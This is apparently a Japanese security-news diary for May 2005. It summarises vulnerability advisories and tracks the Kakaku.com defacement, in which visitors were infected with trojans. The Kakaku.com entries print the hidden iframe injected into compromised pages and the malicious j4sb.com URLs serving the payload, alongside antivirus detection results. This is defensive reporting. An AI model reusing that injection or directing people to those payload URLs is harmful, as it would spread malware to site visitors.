セキュリティホール memo - 2005.05

Last modified: Mon Jan 16 14:27:23 2006 +0900 (JST)


 このページの情報を利用される前に、注意書きをお読みください。


2005.05.31

重要: PowerChute Business Edition v6.x.x 修正対応のご案内
(APC)

 APC PowerChute Business Edition v6.x.x に欠陥。 2005.07.28 06:43 以降に PowerChute サーバ / エージェントサービスを起動しようとしても起動できない。 これは、Sun の Java JDK/JRE に含まれる「暗号化コンポーネントの一部期限切れ」が原因だという。 PowerChute Business Edition v7.0 にはこの欠陥はない。

 対応方法としては、以下の方法がある。

 藤井さん情報ありがとうございます。関連:

2005.06.03 追記:

 APC社製UPS用PowerChute Business Edition v6.X.X不具合と対応のご案内 (ユニシス, 6/3)

2005.06.11 追記:

 重要: PowerChute Business Edition v6.x.x 修正対応のご案内 (APC) が改訂されています。 原因は、Sun の Java JDK/JRE に含まれる「暗号化コンポーネントの一部期限切れ」 ではなく、「PowerChute Business Edition v6.x.xの証明書の期限切れ」だそうです。 また、 APC Security Advisory - Denial of Service Vulnerability with PowerChute Business Edition (apc.com) は全然関係ない話でした。すいません。orz

 奈良さん情報ありがとうございます。

2005.07.14 追記:

 PowerChute Business Edition v6.x.x の問題に関する Q&A集 (APC) ができていました。

いろいろ
(various)

追記

Windows 98/Me+ウイルスバスター2004でWindowsエラーが表示される不具合

 ウイルスバスター2004: アップデート後、「PCCPFWが原因でkernel32.dllにエラー発生しました。」あるいは「PCCPFWのページ違反です。」メッセージが表示される (トレンドマイクロ)。修正プログラムが「1029」に変更されています。 まっちゃだいふくさん情報ありがとうございます。

Computer Associates Vet Antivirus engine heap overflow vulnerability

 BrightStor ARCserve Backup r11.1 には、この欠陥はないそうだ: RE: CAID 32896 - Computer Associates Vet Antivirus engine heap overflow vulnerability

*BSD, SCO OpenServer / UnixWare Hyper-Threading Considered Harmful

 JVNVU#911878: simultaneous multithreading プロセッサにおける機密情報漏洩の可能性

 (typo fixed: 熊猫さくらさん感謝)

[SA15486] BEA WebLogic Multiple Vulnerabilities
(secunia, 2005.05.24)

 BEA WebLogic Server 6.x / 7.x / 8.x, BEA WebLogic Express 6.x / 7.x, BEA WebLogic Portal 8.x に複数の欠陥。 最新の Service Pack で修正されているか、 patch が用意されている。

2005.06.01 追記:

 セキュリティアドバイザリ (beasys.co.jp) に日本語版が出ています。vulcan さん情報ありがとうございます。


2005.05.30

Sentinel Chicken Networks Security Advisory #04: ClamAV: Local Privilege Escalation Vulnerability On MacOS
(sentinelchicken.com, 2005.05.27)

 ClamAV 0.80rc4 〜 0.84rc2 を Mac OS X 上で利用する場合に欠陥。 内部的に利用している ditto コマンドの呼び出しに欠陥があり、 細工を施したファイル名を指定することにより任意のシェルコマンドを実行可能。

 ClamAV 0.84 以降で修正されている。

追記

*BSD, SCO OpenServer / UnixWare Hyper-Threading Considered Harmful

 「OSベンダー各社の対応は遅すぎ」--インテルチップの脆弱性で研究者が非難 (CNET, 2005.05.30)


2005.05.29

鶴亀メール Version 4.15時点で見つかった脆弱性について
(秀まるおのホームページ, 2005.05.27)

 鶴亀メール 3.53〜4.15 に欠陥。特殊なメールによって「偽装されたメール」を生成することが可能となり、 「受信した側の鶴亀メールユーザー様を混乱させ、二次的な被害(例えばウィルス感染したと勘違いしたり、個人情報が漏洩したと勘違いする等)を発生させる恐れがあ」るという。詳細は公開されていない。「偽装」というと XSS を連想してしまうのだが、はてさて……。

 鶴亀メール 4.16 で修正されている。また鶴亀メール 4.16 で「受信解析のやり直し」を実行すると、「偽装されたメール」かどうかを確認することができる (4.15 以前と 4.16 とで「受信解析のやり直し」の結果が異なる)。

追記

Windows 98/Me+ウイルスバスター2004でWindowsエラーが表示される不具合

 まっちゃだいふくさんから (ありがとうございます):

Trendのページでは、1.2.0.1027が問題のあるモジュールだそうですが、以下、
http://www.trendmicro.co.jp/esolution/solutionDetail.asp?solutionId=11404から引用
---
バージョン情報]ダイアログボックス内に表示される「ファイアウォールドライバ」
のバージョンを確認し、「1.2.0.1027」となっていれば今回の問題に該当します。
---

ダウンロードできる修正モジュールはvb24_TM_CFW_1020.exeです。
これって、もしや、1.2.0.1020の古いモジュール?!と思って調べてみると
---
strings TM_CFW.VXD
<SNIP>
VxD TM_CFW (VtoolsD)
_The_DDB
VS_VERSION_INFO
StringFileInfo
040904E4
ProductVersion
1.2.0.1020
ProductName
Trend Micro Common Firewall 1.2
---
あぁ、、、修正モジュールじゃなくって、戻すモジュールかい!!!!!!!
とりあえずの対処なのでしょうがないですかね。
      
でも、これは決して修正モジュールとは呼ばない!と まっちゃは思ったのでした。

2005.05.28


2005.05.27

Windows 98/Me+ウイルスバスター2004でWindowsエラーが表示される不具合
(ITmedia, 2005.05.27)

 Windows 98 (多分 98 SE も) / Me + ウイルスバスター 2004 + 2005.05.26 20:20 〜 2005.05.27 02:30 の間にアップデートした人、 の場合にエラーが出るそうで。ちいちゃんさん情報ありがとうございます。

 solution 11404 から修正モジュールを入手できます。修正モジュールを見てみると:

% unzip -l vb24_TM_CFW_1020.exe 
Archive:  vb24_TM_CFW_1020.exe
warning [vb24_TM_CFW_1020.exe]:  75232 extra bytes at beginning or within zipfile
  (attempting to process anyway)
  Length     Date   Time    Name
 --------    ----   ----    ----
   759931  11-05-04 16:07   TM_CFW.VXD
    98304  11-05-04 16:08   tmCfwApi.dll
 --------                   -------
   858235                   2 files

 何が修正されたんだろうなあ。

2005.05.29 追記:

 まっちゃだいふくさんから (ありがとうございます):

Trendのページでは、1.2.0.1027が問題のあるモジュールだそうですが、以下、
http://www.trendmicro.co.jp/esolution/solutionDetail.asp?solutionId=11404から引用
---
バージョン情報]ダイアログボックス内に表示される「ファイアウォールドライバ」
のバージョンを確認し、「1.2.0.1027」となっていれば今回の問題に該当します。
---

ダウンロードできる修正モジュールはvb24_TM_CFW_1020.exeです。
これって、もしや、1.2.0.1020の古いモジュール?!と思って調べてみると
---
strings TM_CFW.VXD
<SNIP>
VxD TM_CFW (VtoolsD)
_The_DDB
VS_VERSION_INFO
StringFileInfo
040904E4
ProductVersion
1.2.0.1020
ProductName
Trend Micro Common Firewall 1.2
---
あぁ、、、修正モジュールじゃなくって、戻すモジュールかい!!!!!!!
とりあえずの対処なのでしょうがないですかね。

でも、これは決して修正モジュールとは呼ばない!と まっちゃは思ったのでした。

2005.06.01 追記:

 ウイルスバスター2004: アップデート後、「PCCPFWが原因でkernel32.dllにエラー発生しました。」あるいは「PCCPFWのページ違反です。」メッセージが表示される (トレンドマイクロ)。修正プログラムが「1029」に変更されています。 まっちゃだいふくさん情報ありがとうございます。

Extreme Networks Field Notice - FN0215: Extreme Networks Security Alert on ExtremeWare XOS Based Systems
(Extreme Networks, 2005.05.12)

 BlackDiamond 8800 / 10808 (10K) Switch 上の ExtremeWare XOS 10.x / 11.x に欠陥。 ユーザレベルアカウントから管理者権限でのアクセスが可能になってしまう。

 ExtremeWare XOS 11.0.2.4 および 11.1.3.3 で修正されている。

追記

価格.comサイトが不正アクセス被害で閉鎖中

 同様事例:

  • ウイルスに関する追加情報 2005/5/27 20:30 追加情報 (ozmall.co.jp)

     ウィルス感染につきましては、5月25日(水)中にオズモールにアクセスした一部の方に、インターネットキャッシュフォルダにウイルスファイルがダウンロードされてしまうという現象が確認されました。判明している新種ウイルスは「PWS-Lineage.dll」という種類であり、最新ウイルス定義ファイル(4492以降)を適用しているマカフィー社のManaged VirusScanで検出し、対処可能なことを確認しております。そのほか、セキュリティソフト各社に対応を確認中であり、判明次第、ご報告させていただきます。
ASP.NET パス検証の脆弱性 (887219) (MS05-004)

 Installation of .NET Framework service packs is not completed if you first install security update MS05-004 (Microsoft)。

Windows Kernel の脆弱性により、特権の昇格およびサービス拒否がおこる (890859) (MS05-018)

 You receive a "STOP 0x0000001E" error after you install security update MS05-018 on a Windows 2000-based computer (Microsoft)。サポート経由で hotfix を入手可能らしい。

JVN#FCAD9BD8: メールクライアントソフトにおける mailto URL scheme の不適切な解釈

 Becky! Internet Mail Ver.2.21.02 (Bcc 無視版) 登場にあわせて記述を修正。

 関連: mailto: URL で Bcc: が指定できてしまう問題 (水無月ばけらのえび日記, 2005.05.26)


2005.05.26

いろいろ
(various)

NISCC Vulnerability Advisory DNS - 589088: Vulnerability Issue in Implementations of the DNS Protocol
(UNIRAS, 2005.05.24)

 複数ベンダの DNS データ処理に欠陥。 RFC1035 の 4.1.4 で定義されている、 圧縮された DNS メッセージの展開処理に欠陥があり、異常終了や任意のコードの実行などが可能となる場合がある。 欠陥があるとされているのは以下のもの:

 また NISCC Vulnerability Advisory DNS - 589088 には記載されていないが、Cisco から Cisco Security Notice: Crafted DNS Packet Can Cause Denial Of Service (Cisco) が出ている。 Cisco IP Phones 7902/7905/7912, Cisco ATA (Analog Telephone Adaptor) 186/188, Cisco Unity Express, Cisco ACNS (Application and Content Networking System) devices に欠陥があり、DoS 状態になる模様。

 関連: NISCC-589088: DNS パケットに含まれる圧縮されたデータの展開処理に関する脆弱性 (JVN)

Keynote 2.0.2: Security enhancements
(Apple, 2005.05.26)

 Keynote 2 / 2.0.1 に欠陥。細工した Keynote プレゼンテーションと keynote: URI ハンドラの利用により、local file を読み取って任意のネットワーク地点に送ることが可能。CVE: CAN-2005-1408

 Keynote 2.0.2 で修正されている。Keynote 2.0.2 では、外部リソースの参照が制限され、keynote: URI ハンドラは削除された。

 ソフトウェア アップデートから Keynote 2.0.2 を入手・アップグレードできる。 日本語の Keynote ダウンロードページではまだ Keynote 2.0.1 が配布されている。

Netscape 8をインストールするとIEのXML機能に異常
(Internet Watch, 2005.05.26)

IEBlogによると、問題を解決するにはNetscape 8をアンインストールした後、レジストリエディタを起動して「HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\Plugins\Extension」の項目にある「xml」と記されたノードを削除しなければならないという。その後、IEを再起動するとIEのXMLレンダリング機能が正常に働くようになる。Netscape 8がインストールされた状態では絶えずこのレジストリを記入し続けるため、IEのXMLレンダリング機能を復旧することができないとしている。

 だそうなので、Netscape 8 を利用する場合はご注意。

2005.06.22 追記:

 Netscape 8.02 で修正されたそうです: IEに異常をもたらした“Netscape 8問題”を修正、「Netscape 8.02」公開 (Internet Watch, 2005.06.20)

JVN#FCAD9BD8: メールクライアントソフトにおける mailto URL scheme の不適切な解釈
(JVN, 2005.05.26)

 Cc: や Bcc: を含ませた mailto: URL をたどった場合に、Cc: や Bcc: が存在することに気がつかない (表示されない、気がつきにくい等) ままメールを送ってしまうメールソフトがある、という話の模様。 RFC2368: The mailto URL scheme にはこんな文章もあるそうで:

Note that some headers are inherently unsafe to include in a message generated from a URL. For example, headers such as "From:", "Bcc:", and so on, should never be interpreted from a URL. In general, the fewer headers interpreted from the URL, the less likely it is that a sending agent will create an unsafe message.

 mailto: URL 中の、少なくとも Bcc: は、無視するのが適切な動作なのでしょう。 Cc: も無視していいような気がするけど。

 状況:

2005.05.27 追記:

 Becky! Internet Mail Ver.2.21.02 (Bcc 無視版) 登場にあわせて記述を修正。

 鶴亀メールでのmailto:プロトコルに関係した脆弱性について (maruo.co.jp) へのリンクを追加。

 関連: mailto: URL で Bcc: が指定できてしまう問題 (水無月ばけらのえび日記, 2005.05.26)

追記

TCP/IP の脆弱性により、リモートでコードが実行され、サービス拒否が起こる (893066) (MS05-019)

 Microsoft Security Advisory (899480) の日本語版が出ました: マイクロソフト セキュリティ アドバイザリ (899480) TCP の脆弱性により、接続がリセットされる (Microsoft)


2005.05.25

Computer Associates Vet Antivirus engine heap overflow vulnerability
(CA, 2005.05.23)

 CA の eTrust Antivirus や BrightStor ARCserve Backup r11.1、Zonelabs の ZoneAlarm SecuritySuite / AntiVirus などに含まれる Vet エンジンの 11.9.1 より前の版に欠陥。OLE ストリームの解析時に integer overflow を起因とする heap overflow が発生、攻略 Office ドキュメントにより任意のコードを実行可能。 玉岡さん情報ありがとうございます。

 Vet エンジン 11.9.1 で修正されている。自動更新される製品 (eTrust EZ Antivirus 7.x など) と、手動によるアップデートが必要な製品 (eTrust EZ Antivirus 6.x, eTrust EZ Armor 2.x) がある。

 関連:

2005.05.31 追記:

 BrightStor ARCserve Backup r11.1 には、この欠陥はないそうだ: RE: CAID 32896 - Computer Associates Vet Antivirus engine heap overflow vulnerability

いろいろ
(various)

追記

JVN#465742E4: Wiki クローンにおけるクロスサイトスクリプティングの脆弱性

 ファイル添付の脆弱性に関するブラウザの調査 (ふぇみにん日記, 5/21)。Hiki で取られた対応方法が無効であるような web ブラウザが実在するようで、テストページが公開されています。 今 (2005.05.25 12:05) のところ、そのようなブラウザとして Mac 版 Internet Explorer 5.1.7 / 5.2.3 が挙げられています。


2005.05.24

追記

JVN#465742E4: Wiki クローンにおけるクロスサイトスクリプティングの脆弱性

 FreeStyleWiki にも同様の欠陥があったようで、3.5.8 で修正されているそうです:


2005.05.23

iBook G4およびPowerBook G4バッテリー交換プログラム
(Apple, 2005.05.21?)

 12 インチ iBook G4、12 インチ PowerBook G4、15 インチ PowerBook G4 のバッテリの一部に、過熱し発火する可能性があるそうで、無償交換を行っているそうです。 iBook G4 / PowerBook G4 利用者はご確認を。対象となるバッテリの型番は以下のとおりです。

コンピュータモデル バッテリーの Model No. シリアル番号 (バーコード部分) の上 4 桁の範囲
12 インチ iBook G4 A1061 HQ441〜HQ507
12 インチ PowerBook G4 A1079 3X446〜3X510
15 インチ PowerBook G4 A1078 3X446〜3X509

 しかし、こういう重要なニュースが ホットニュース (Apple) に掲載されないのはなんでだろう。


2005.05.21

いろいろ
(various)

追記

Vulnerability Note VU#637934: TCP does not adequately validate segments before updating timestamp value

 FreeBSD の項に情報を追加しました。

「Firefox」に任意コードが実行される脆弱性が存在、近日公開のv1.0.4で修正か

 Mozilla 1.7.8 日本語版が登場しています。小出さん情報ありがとうございます。

About the security content of the Mac OS X 10.4.1 Update
(Apple, 2005.05.20)

 先日登場した Mac OS X 10.4.1 (Client, Server) には複数のセキュリティ欠陥に対する修正が含まれているそうです。

 関連:


2005.05.20

いろいろ
(various)

追記

OLE および COM の脆弱性により、リモートでコードが実行される (873333) (MS05-012)

 不具合情報: 894391 - [FIX] セキュリティ更新プログラム MS05-012 をインストール後、リッチテキスト形式の電子メールメッセージで 2 バイト文字セットの添付ファイル名が表示されず、エラーメッセージ "Generic Host Process" が表示されることがある (Microsoft)。 patch も公開されている: キーワード "894391" (Microsoft ダウンロードセンター)。 この patch で次についても修正される模様:

 896648 - セキュリティ更新プログラム 873333 (MS05-012) のインストール後 svchost.exe エラーが発生することがあります (Microsoft) については「Windows XP COM+ 修正プログラムロールアップパッケージ 9 を」のままだが、 894391 をインストールすると呼び出され側の ole32.dll が更新されるので、状況が変化するかもしれない。

 フロートさん情報ありがとうございます。

TCP/IP の脆弱性により、リモートでコードが実行され、サービス拒否が起こる (893066) (MS05-019)

 MS05-019 patch には、Vulnerability Note VU#637934: TCP does not adequately validate segments before updating timestamp value に対する修正も含まれているそうだ。

 また Microsoft Security Advisory (899480) には、MS05-019 patch が 6 月に再リリースされる予定である、とも記載されている。 KB898060 問題が修正されるようだ。

NISCC Vulnerability Advisory ICMP - 532967: Vulnerability Issues in ICMP packets with TCP payloads

 「TCP実装におけるICMPエラーメッセージ処理に関する脆弱性」対策について (日立)

Vulnerability Note VU#637934: TCP does not adequately validate segments before updating timestamp value
(cert.org, 2005.05.19)

 複数ベンダの TCP 実装に欠陥。 RFC1323: TCP Extensions for High Performance で定義されている TCP Timestamps オプションと、これも RFC1323 で解説されている PAWS (Protect Against Wrapped Sequence Numbers) の両方が有効にされた場合を考える。 このとき、ホストの IP アドレス・ポート番号の他に、内部タイマ値と TCP シーケンス番号を知ることができると、 「TCP Timestamps > 内部タイマ、TCP シーケンス番号 < 現在の TCP シーケンス番号」というパケットを挿入することによって、 PAWS 機構を悪用した TCP リセット攻撃を行うことが可能。 ここまでは仕様なのだが、 一部の TCP 実装では TCP シーケンス番号をきちんと検証していないため、 PAWS 機構を悪用した TCP リセット攻撃をより容易に実行することが可能。 という理解でいいのかな。 CVE: CAN-2005-0356

 回避策として、RAWS の無効化が挙げられている。

 欠陥のあるベンダとして、Cisco, Microsoft, FreeBSD, OpenBSD, 日立などが挙げられている。

 関連:

2005.05.21 追記:

 FreeBSD の項に情報を追加しました。

2005.06.02 追記:

 CVE: CAN-2005-0356BIG-IP TCP Timestamp Denial of Service を追加。

2005.07.04 追記:

 FreeBSD の項に FreeBSD-SA-05:15.tcp - TCP connection stall denial of service を追加しました。


2005.05.19

JVN#465742E4: Wiki クローンにおけるクロスサイトスクリプティングの脆弱性
(JVN, 2005.05.19)

 Wiki というのは、ふつうは任意のタグとかスクリプトとかは書けないようになっていると思うのだけど、「ファイル添付機能」がある Wiki クローンにおいて、スクリプトつきのファイルを添付させることで、そのスクリプトを Wiki サーバのセキュリティゾーン権限で実行させることができる、という欠陥があった……という理解でいいのかな。

 とりあえず回避するには、「ファイル添付機能」を無効にすればよい。

 JVN#465742E4 では AsWiki と Hiki は「該当製品なし」となっているのだが、実際には、 AsWiki では「それはそういうもの」と仕様扱いだし、Hiki は「Hiki 0.6.6 ならびに Hiki 0.8.0 preview1 にて修正しました」なので、Hiki 0.6.5 以前には欠陥が存在するはず。

 Wikiもどき セキュリティ情報には「添付ファイル機能の利用制限」というものも掲載されているのだが、Internet Explorer みたいなブラウザ (Content-Type ではなく中身を見て勝手に判断) だと実質無意味な気が……。

 あと、たとえば FreeStyleWiki にも「ファイル添付機能」があるようなのだが、本件についてどうなっているのか、は、よくわからない。

 関連:

2005.05.24 追記:

 FreeStyleWiki にも同様の欠陥があったようで、3.5.8 で修正されているそうです:

2005.05.25 追記:

 ファイル添付の脆弱性に関するブラウザの調査 (ふぇみにん日記, 5/21)。Hiki で取られた対応方法が無効であるような web ブラウザが実在するようで、テストページが公開されています。 今 (2005.05.25 12:05) のところ、そのようなブラウザとして Mac 版 Internet Explorer 5.1.7 / 5.2.3 が挙げられています。

追記

2005 年 4 月のセキュリティ情報

 Windows インストーラ 3.1(v2) と、Windows 2003 SP1 および 64bit 版 Windows XP 用の Windows インストーラ 3.1 アップデートが公開されています。

bid 9986: OpenSSH SCP Client File Corruption Vulnerability

 CVE: CAN-2004-0175


2005.05.18

追記

*BSD, SCO OpenServer / UnixWare Hyper-Threading Considered Harmful

 どうやら OS には依存しないお話だったようで……。

 あと、FreeBSD-SA-05:09.htt [REVISED]SCOSA-2005.24: OpenServer 5.0.7 UnixWare 7.1.4 UnixWare 7.1.3 : Hyper-Threading information leakage が出たので、これまでの記事のところに追加しておきました。

Internet Explorer 用の累積的なセキュリティ更新プログラム (867282) (MS05-014)

 副作用情報:

 MS05-020 で対応しているそうだ。

「ウイルスセキュリティ」におけるヒープオーバーフロー・メモリリークの脆弱性

 LAC SNS から情報が公開されました。

価格.comサイトが不正アクセス被害で閉鎖中

 同様事例:

 しかし、そんな程度では済まないかも。いとちゃんさんから (ありがとうございます):

Googleで「Powered by phpBB 2.0.11」(日本語で)を検索して、phpBBサイト
http://www.ptexchange.net (修復済み)
http://www.hobbyjapan.co.jp/dd/ddbbs
http://www.princess2.com/phpbb2/index.php
http://granadoespada.sub.jp/php/phpbb2/index.php
(まで確認。以下もあるかもしれません。)
に価格コムと同じと思われる改ざんがある模様です。
(j4sb.comへのiframe)

 つーか phpBB 2.0.11 ……。「Powered by phpBB 2.0.11 の検索結果のうち 日本語のページ 約 1,010 件中 1 - 10 件目 (0.30 秒) 」って言われるし。 英語だと検索をブロックしているけど、日本語だと ok なのね > google。って、[次へ] は選択できないみたい。

 Sophos が Troj/LegMir-AE (2005.05.17 19:45:48) として対応しました。 スクリプト部分は Troj/Jfor-A (2005.05.18 04:31:50) です。 舘山さん情報ありがとうございます。

 ……その後:

 http://www.princess2.com/phpbb2/index.php や http://granadoespada.sub.jp/php/phpbb2/index.php も対応されたようです。

 関連報道:

いろいろ
(various)


2005.05.17

追記

TCP/IP の脆弱性により、リモートでコードが実行され、サービス拒否が起こる (893066) (MS05-019)

 Windows (XP, 2k3, Longhorn) is vulnerable to IpV6 Land attack. (ntbugtraq)。 patch 適用後も、IPv6 については land アタックが有効である、という指摘。

価格.comサイトが不正アクセス被害で閉鎖中

 アンチウイルスソフトでのテスト結果を改訂しました。マカフィーとシマンテックは a02.css をウイルスだと判定するようになりました。 マカフィーの場合は、http://www.j4sb.com/count/counter.ap?id=a05 にアクセスすると出てくるスクリプトにも Exploit-MhtRedir.gen として対応しています。MYST jellyfish さん情報ありがとうございます。

 シマンテックからも削除ツールが公開されています。 MYST jellyfish さん情報ありがとうございます。

 価格.com と同様の状況が、WindowsCE FAN: PocketPC WindowsCE シグマリオン 総合情報サイトでも発生していたようです。清水さん情報ありがとうございます。

Firefox 1.0.4 / Mozilla 1.7.8 で修正された欠陥
(mozilla.org, 2005.05.11)

 Firefox 1.0.4 / Mozilla 1.7.8 で修正された欠陥は、 「Firefox」に任意コードが実行される脆弱性が存在、近日公開のv1.0.4で修正か の件 (MFSA2005-42) だけじゃなかったんですね。

 どちらも「重要度: 最高」です。2005.05.18 以降に詳細が公開されるようです。

 (タイトル修正: なかださん感謝)


2005.05.16

価格.comサイトが不正アクセス被害で閉鎖中
(slashdot.jp, 2005.05.15)

 価格.com が、遅くとも 5/11 までに不正アクセスされてコンテンツの一部が改ざんされ、5/14 に閉鎖されるまでの間、ウイルスつきサイトになっていた模様。 おおかわさん、ゆう。さん情報ありがとうございます。

この改ざんにより、何者かが当社サイトを媒介としてウィルスソフトを無差別に送りつけ、当社サイトを閲覧されたお客様がウィルスファイルを取込んでしまった可能性があります。判明しているウィルスは「trojandownloader.small.AAO」「PSW.Delf.FZ」の2種類であり、アンチウィルスソフト「NOD32」にて対処可能な事を確認しております。

 NOD32 なんてマイナーなアンチウイルスソフトの状況だけ解説されても……(T_T)。 即刻メジャー 3 種 (トレンドマイクロ、シマンテック、マカフィー) を買ってきて対応状況を確認するのが筋なんじゃないのか。

その他セキュリティソフト各社にも対応を確認中であり、判明次第ご報告させて頂きます。

 その程度のことに何時間かかるんだろう。 2ch.net のまとめページだという 価格.comがクラッキングで一時閉鎖、閲覧ユーザーはウイルス感染も(´・ω・) の方がよっぽど詳しい。

879 名前: 名無しさん@5周年 [sage] 投稿日: 2005/05/16(月) 06:30:58 ID:8NCW1riY
PSW.Delf.FZの検出能力の確認。
ttp://www.j4sb.com/count/counter.ap?id=a02
ttp://www.j4sb.com/count/data/a02.css
上記URLからa02.cssを保存してこれをスキャン

 やってみました。

NOD32 1.1097 (20050515) >>CHM >>/# - Win32/TroyanDownloader.Small.AAO トロイ
>>CHM >>/#.exe - Win32/PSW.Delf.FZ トロイ
F-Secure Anti-Virus for Linux Servers version 4.63 build 4110
Database version: 2005-05-14_01
Trojan-PSW.Win32.Delf.fz
Virus Scanner v3.1, VSAPI v7.510-1002
Trend Micro Inc. 1996,1997
Pattern number 2.631.00
検出せず (※)
トレンドマイクロ ウイルスバスター 2005
プログラムバージョン: 12.2.1021
検索エンジン: 7.510.1002
パターン: 2.631.00
検出せず (※)
ClamAV 0.85/881/Tue May 17 06:13:31 2005 検出せず
Sophos AntiVirus 3.93.2 Troj/LegMir-AE (2005.05.17 19:45:48)
マカフィー VirusScan Enterprise 8.0i + engine 4400 + dat 4492 PWS-Lineage
シマンテック Norton AntiVirus 2005 + 20050516.022 Trojan.Jasbom

 NOD32 は a02.css に対して 2 つの「ウイルス」を検出しているのですね。 なお a02.css は HTML HELP (.CHM) 形式のファイルのようです。

 (※) a02.css そのものではなく、攻略スクリプトと組みあわされた結果生成されるファイルを検出するプロダクトもあるようです。

 同様事例: セキュリティ対策 (感染源サイト): J-RMT (bne.jp)。 J-RMT というのは http://j-rmt.com/ のようです。http://j-rmt.com/ には今でも <iframe src=http://www.j4sb.com/count/counter.ap?id=a05 width=0 height=0></iframe> とか書かれていますので、試す場合は十分ご注意を。 J-RMT は韓国のサイトなんですね。

2005.05.16 追記:

 トレンドマイクロから TROJ_DELF.RM の駆除ツールが公開されています。

 記事いろいろ:

 ふつうの企業では発生しない状況になっているにもかかわらず「最高レベルのセキュリティが破られた」とか「今回の攻撃は、レベルの高いものだった」とか言えてしまう、その判断基準が理解できない。 本当に「最高レベルのセキュリティ」だったのか、それとも、 元中の人から言わせると、自業自得です (slashdot.jp) が正しいのか。 当社運営サイトに対する不正アクセスとサイト一時閉鎖に関してのご報告 (kakaku.com) で「サイバーテロ」という、安易に使うべきではない言葉を使っているのも大いに気になる。

2005.05.17 追記:

 アンチウイルスソフトでのテスト結果を改訂しました。マカフィーとシマンテックは a02.css をウイルスだと判定するようになりました。 マカフィーの場合は、http://www.j4sb.com/count/counter.ap?id=a05 にアクセスすると出てくるスクリプトにも Exploit-MhtRedir.gen として対応しています。MYST jellyfish さん情報ありがとうございます。

 シマンテックからも削除ツールが公開されています。 MYST jellyfish さん情報ありがとうございます。

 価格.com と同様の状況が、WindowsCE FAN: PocketPC WindowsCE シグマリオン 総合情報サイトでも発生していたようです。清水さん情報ありがとうございます。

2005.05.18 追記:

 同様事例:

 しかし、そんな程度では済まないかも。いとちゃんさんから (ありがとうございます):

Googleで「Powered by phpBB 2.0.11」(日本語で)を検索して、phpBBサイト
http://www.ptexchange.net (修復済み)
http://www.hobbyjapan.co.jp/dd/ddbbs
http://www.princess2.com/phpbb2/index.php
http://granadoespada.sub.jp/php/phpbb2/index.php
(まで確認。以下もあるかもしれません。)
に価格コムと同じと思われる改ざんがある模様です。
(j4sb.comへのiframe)

 つーか phpBB 2.0.11 ……。「Powered by phpBB 2.0.11 の検索結果のうち 日本語のページ 約 1,010 件中 1 - 10 件目 (0.30 秒) 」って言われるし。 英語だと検索をブロックしているけど、日本語だと ok なのね > google。って、[次へ] は選択できないみたい。

 Sophos が Troj/LegMir-AE (2005.05.17 19:45:48) として対応しました。 スクリプト部分は Troj/Jfor-A (2005.05.18 04:31:50) です。 舘山さん情報ありがとうございます。

 ……その後:

 http://www.princess2.com/phpbb2/index.php や http://granadoespada.sub.jp/php/phpbb2/index.php も対応されたようです。

 関連報道:

2005.05.19 追記:

 ネット侵入 上毛新聞もウイルス感染 (毎日, 5/19)。

2005.05.28 追記:

 同様事例:


2005.05.15


2005.05.13

*BSD, SCO OpenServer / UnixWare Hyper-Threading Considered Harmful
(daemonology.net, 2005.05.13)

 *BSD と SCO OpenServer / UnixWare に欠陥。Hyper-Threading をサポートする CPU (インテル Pentium Extreme Edition, Pentium 4, Mobile Pentium 4, Xeon) において、特権ユーザにしか取得できないようなセンシティブ情報を local の一般ユーザが取得できてしまう模様。 BSDCan 2005 で詳細が公開されるそうだ。 松澤さん情報ありがとうございます。

 回避するには Hyper-Threading を無効にすればよい。

2005.05.18 追記:

 どうやら OS には依存しないお話だったようで……。

 あと、FreeBSD-SA-05:09.htt [REVISED]SCOSA-2005.24: OpenServer 5.0.7 UnixWare 7.1.4 UnixWare 7.1.3 : Hyper-Threading information leakage が出たので、これまでの記事のところに追加しておきました。

2005.05.30 追記:

 「OSベンダー各社の対応は遅すぎ」--インテルチップの脆弱性で研究者が非難 (CNET, 2005.05.30)

2005.05.31 追記:

 JVNVU#911878: simultaneous multithreading プロセッサにおける機密情報漏洩の可能性

2005.06.02 追記:

 101739: Simultaneous Multi-Threading Processors May Leak Information (Sun)。Sun Solaris でのお話。Solaris 10 には Zones なんて機能があるのですか。

追記

「Firefox」に任意コードが実行される脆弱性が存在、近日公開のv1.0.4で修正か

 今回の欠陥が修正された Mozilla 1.7.8 も登場しています。 また日本語版の Firefox 1.0.4 も登場しています。 小出さん情報ありがとうございます。 Mozilla 1.7.8 の日本語版は、まだないようだ。


2005.05.12

「ウイルスセキュリティ」におけるヒープオーバーフロー・メモリリークの脆弱性
(IPA, 2005.05.12)

 ソースネクストのウイルスセキュリティに欠陥。バージョン 2.0.0.7 以前の「eメール自動監視」(K7EmlPxy.exe) に欠陥があり、

 修正モジュールが用意されている。ウイルスセキュリティのアップデート機構を使ってアップデートすればよい。

2005.05.18 追記:

 LAC SNS から情報が公開されました。

MT に脆弱性
(水無月ばけらのえび日記, 2005.05.12)

 blog ツール Movable Type の 3.16 より前の 3.x に欠陥。セッション管理に欠陥があり、第三者に Movable Type のユーザ権限を奪取される可能性がある。 セッション cookie 値に Movable Type アカウントのハッシュ値が含まれており、 さらにそれは Atom API のパスワードであるという。

通常のセッションハイジャックの場合、ターゲットがログアウトしてしまえばサーバ側で Cookie が無効になります。すると攻撃者に盗まれた Cookie も無効になり、それは二度と有効になりませんので、攻撃者が再度ログインしたい場合は盗聴なり攻撃なりをもう一度成功させなければなりません。が、 Cookie が恒久的に使えれば攻撃者もその Cookie を恒久的に使えるわけでして、一度でも盗聴されたらそれでアウトになってしまうという事ですね。

 Movable Type 3.16 で修正されている。 日本語版である Movable Type 3.16-ja は 6 月上旬に登場する予定。 Movable Type 3.16 Changelog には

Security
* Made several important improvements with regards to application authentication and security.

とあるが、本件がその 1 つだったというわけか。

追記

「Firefox」に任意コードが実行される脆弱性が存在、近日公開のv1.0.4で修正か

 今回の欠陥が修正された Firefox 1.0.4 が登場しています (リリースノート)。しかし Firefox 1.0.4 日本語版は残念ながらまだ提供されていないようです。

Microsoft Security Advisories

 日本語版出ました: マイクロソフト セキュリティ アドバイザリ (試験公開版) (Microsoft)。


2005.05.11

いろいろ
(various)

Microsoft Security Advisories
(Microsoft, 2005.05.11)

 Microsoft Security Advisories、試運転版だそうで。 今回は 2 件:

2005.05.12 追記:

 日本語版出ました: マイクロソフト セキュリティ アドバイザリ (試験公開版) (Microsoft)。

「iTunes 4.7」にMPEG-4関連の深刻な脆弱性、Appleが修正版を公開
(Internet Watch, 2005.05.10)

